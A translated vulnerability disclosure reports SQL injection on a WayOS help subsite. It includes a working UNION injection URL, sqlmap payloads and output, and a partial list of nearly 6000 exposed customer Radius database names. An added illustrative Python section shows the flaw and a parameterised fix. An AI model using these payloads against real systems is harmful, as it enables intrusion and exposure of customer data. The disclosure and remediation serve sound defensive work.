2014-11-14: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2014-12-29: The vendor has actively ignored the vulnerability; details disclosed to the public.
The landlord ran a network cable to my place: a miserable 100k/s, and he charges me ¥50/month. I originally wanted to break into the landlord's router, then found it was WayOS. So I went over to the official site for a look.
On one of its subsites I found an injection:
http://help.wayos.cn//detail.php?hp_id=51%20and%201=2%20union%20select%201,concat%28user%28%29,0x20,database%28%29,0x20,version%28%29%29,3,4,5,6,7,8,9,10,11
I ran it through sqlmap:
sqlmap identified the following injection points with a total of 43 HTTP(s) requests:
---
Place: GET
Parameter: hp_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: hp_id=47 AND 9686=9686

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: hp_id=47 AND (SELECT 6038 FROM(SELECT COUNT(*),CONCAT(0x3a736b6a3a,(SELECT (CASE WHEN (6038=6038) THEN 1 ELSE 0 END)),0x3a7670693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: hp_id=47 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a736b6a3a,0x486c4143774e454a534c,0x3a7670693a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: hp_id=47 AND SLEEP(5)
---
Then I discovered the server held nearly 6000 databases. Good grief, what is all this? The database names follow the pattern: the customer's name for their WayOS product + Radius.
available databases [5984]:
[*] a00jian_Radius
[*] A023A_Radius
[*] a03551_Radius
[*] a10000_Radius
[*] a100144_Radius
[*] a10104091_Radius
[*] a102699_Radius
[*] a107258222_Radius
[*] a109738668_Radius
[*] a111111112_Radius
[*] a11111111_Radius
[*] a11111_Radius
[*] a1111_Radius
[*] a112013_Radius
[*] a11788_Radius
.......................................
[*] zzq520_Radius
[*] zzqjsy_Radius
[*] zzsj0371_Radius
[*] zzvnet_Radius
[*] zzxqcdc_Radius
[*] zzy1981_Radius
[*] zzy8202003_Radius
[*] zzzfan007_Radius
1. Fix the injection first.
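The report's remedy is a one-liner, so here is what it means in code. This is an added illustration, not code from WayOS or from the original report: the table name help_detail, its columns, the admin table and the row contents are all constructed for the example, and SQLite stands in for the site's MySQL. detail_vulnerable() reproduces the defect class on the page (the raw hp_id query-string value is concatenated into the SQL text), while detail_fixed() shows the repair: validate the value's type and then bind it as a query parameter, so the database never sees attacker-controlled SQL.

```python
import sqlite3


def make_db():
    """Constructed in-memory schema standing in for the help-article table
    (table and column names are assumptions, not the real site's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE help_detail (hp_id INTEGER PRIMARY KEY, title TEXT, body TEXT)"
    )
    conn.execute(
        "INSERT INTO help_detail VALUES (47, 'Port forwarding', 'How to forward ports')"
    )
    conn.execute(
        "INSERT INTO help_detail VALUES (51, 'PPPoE setup', 'Dial-up configuration')"
    )
    # A second table the detail page must never be able to reach.
    conn.execute("CREATE TABLE admin (id INTEGER, login TEXT)")
    conn.execute("INSERT INTO admin VALUES (1, 'admin_user')")
    conn.commit()
    return conn


def detail_vulnerable(conn, hp_id):
    """The defect: the query-string value is spliced straight into the SQL text.
    Any 'and ... union select ...' suffix becomes part of the statement."""
    sql = "SELECT hp_id, title, body FROM help_detail WHERE hp_id=" + hp_id
    return conn.execute(sql).fetchall()


def detail_fixed(conn, hp_id):
    """The fix: enforce the expected type, then pass the value as a bound
    parameter.  The SQL text is constant, so the value can never alter it."""
    if not isinstance(hp_id, str) or not hp_id.isdigit():
        raise ValueError("hp_id must be a non-negative integer")
    sql = "SELECT hp_id, title, body FROM help_detail WHERE hp_id=?"
    return conn.execute(sql, (int(hp_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Normal request: both versions behave identically.
    print(detail_fixed(db, "51"))
    # A value shaped like the injection in the report: the vulnerable version
    # returns rows from the admin table, the fixed version refuses the input.
    tampered = "51 and 1=2 union select 1,login,3 from admin"
    print(detail_vulnerable(db, tampered))
    try:
        detail_fixed(db, tampered)
    except ValueError as err:
        print("rejected:", err)
```

The type check is belt-and-braces: parameter binding alone already neutralises the injection, but rejecting anything that is not a plain integer also makes the abuse attempt visible in application logs, which is where a defender would want a detection hook.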
Unable to contact the vendor, or the vendor actively refused.